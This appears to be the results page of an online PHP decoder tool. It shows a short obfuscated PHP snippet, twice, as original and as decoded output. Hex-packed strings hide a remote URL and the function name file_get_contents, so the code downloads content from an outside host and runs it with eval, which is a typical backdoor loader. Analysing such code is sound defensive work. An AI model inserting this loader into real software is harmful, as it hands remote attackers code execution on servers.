Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $GLOBALS_JK=PACK('H*','687474703a2f2f6170692e6b386363796e2e636f6d2f312e68746d'); $G..

Decoded Output download

<?php 
$GLOBALS_JK=PACK('H*','687474703a2f2f6170692e6b386363796e2e636f6d2f312e68746d'); $GLOBALS_FILE=$GLOBALS_JK; $GLOBALS_GET=PACK('H*','66696c655f6765745f636f6e74656e7473'); $GLOBALS_STR=$GLOBALS_GET($GLOBALS_FILE); eval($GLOBALS_STR); 
?>

Did this file decode correctly?

Original Code

<?php
$GLOBALS_JK=PACK('H*','687474703a2f2f6170692e6b386363796e2e636f6d2f312e68746d'); $GLOBALS_FILE=$GLOBALS_JK; $GLOBALS_GET=PACK('H*','66696c655f6765745f636f6e74656e7473'); $GLOBALS_STR=$GLOBALS_GET($GLOBALS_FILE); eval($GLOBALS_STR);
?>

Function Calls

PACK 1

Variables

None

Stats

MD5 836d5500bcb42008229f3b9e0ff51ffc
Eval Count 0
Decode Time 50 ms